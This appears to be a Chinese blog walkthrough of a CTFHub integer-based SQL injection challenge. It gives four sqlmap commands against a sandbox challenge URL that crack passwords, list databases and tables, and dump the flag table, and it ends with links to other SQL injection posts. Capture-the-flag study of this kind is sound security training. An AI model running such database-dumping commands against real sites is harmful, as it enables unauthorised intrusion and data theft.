【CTFHub】sql注入-整数型注入

题目：

图1. 题目截图

参考网站：

https://sqlmap.org/

主要的解题点：

1. 根据以往的知识，分析可以采用union的形式；
2. 但是还是要善用工具，使用sqlmap可以一步到位
   这里列明一些其中的关键步骤：
   其实本题只要按照sqlmap官网上给出的demo操作即可

• Step1：
  python sqlmap.py -u "http://challenge-5494b9e533db36a0.sandbox.ctfhub.com:10800/?id=1" --batch --password
  

  图1. 破译密码

• Step2:
  python sqlmap.py -u "http://challenge5494b9e533db36a0.sandbox.ctfhub.com:10800/?id=1" --batch --dbs

图2. databases情况

• Step3:
  python sqlmap.py -u "http://challenge-5494b9e533db36a0.sandbox.ctfhub.com:10800/?id=1" --batch --tables -D sqli
  

  图3. tables情况

• Step4:
  python sqlmap.py -u "http://challenge-5494b9e533db36a0.sandbox.ctfhub.com:10800/?id=1" --batch --dump -T flag -D sqli
  

  图4. 拖库

推荐阅读更多精彩内容

• SQL注入

  题目:http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1本题...

  胖佳儿Clara阅读 613评论 0赞 3
• 无处不在的SQL注入

  实训中学习了一下sql注入。于是在i春秋发现了简单的sql注入于是就做的玩了玩。 【无处不在的SQL注入】 下面是...

  雨落八千里阅读 466评论 0赞 1
• SQL注入基础

  MySQL 通过AppServ/wamp/xampp可以在windows系统中快速搭建出一个Apache+PHP+...

  ha9worm阅读 497评论 0赞 0
• Joomla内核SQL注入漏洞（CVE-2018-8045）

  漏洞简介 Joomla是一套网站内容管理系统,使用PHP语言和MySQL数据库开发。Joomla! 3.5.0 -...

  小小怪吃吃吃阅读 1,138评论 0赞 0
• 注入神器sqlmap

  1、查询数据 ./sqlmap.py -u “http://118.184.30.149/sql_server.a...

  linkally阅读 1,510评论 0赞 0